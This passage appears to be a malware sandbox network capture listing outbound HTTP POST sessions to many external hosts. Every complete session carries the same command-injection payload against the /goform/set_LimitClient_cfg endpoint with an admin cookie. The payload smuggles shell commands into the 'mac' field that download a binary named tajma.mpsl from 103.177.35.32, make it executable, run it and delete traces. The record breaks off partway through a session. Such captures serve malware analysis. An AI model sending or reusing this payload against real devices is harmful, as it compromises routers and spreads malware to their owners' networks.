                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        422192.168.2.235420899.153.96.338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293668032 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        423192.168.2.2359064158.95.22.1018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293703079 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        424192.168.2.234484238.230.125.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293725967 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        425192.168.2.235526693.180.132.748080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293744087 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        426192.168.2.235765870.85.197.1178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293772936 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        427192.168.2.235059039.39.245.538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293802977 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        428192.168.2.2337408199.200.142.1128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293858051 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        429192.168.2.2352458124.1.27.1058080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293895006 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        430192.168.2.234308279.199.107.2548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293934107 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        431192.168.2.2349920181.194.23.2348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293960094 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        432192.168.2.234396286.50.161.158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.293960094 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        433192.168.2.2335068194.89.125.488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294018030 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        434192.168.2.233513649.46.151.538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294065952 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        435192.168.2.2334838102.185.165.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294090033 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        436192.168.2.2357962213.77.158.1438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294118881 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        437192.168.2.234755025.73.187.858080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294167995 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        438192.168.2.2357498115.70.208.1448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294235945 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        439192.168.2.2337668176.117.156.48080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294254065 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        440192.168.2.2355722213.222.217.1988080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294305086 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        441192.168.2.2356750176.39.254.2128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294423103 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        442192.168.2.2342604207.130.90.628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294502974 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        443192.168.2.233905213.87.114.758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294543028 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        444192.168.2.2356928156.65.18.348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294596910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
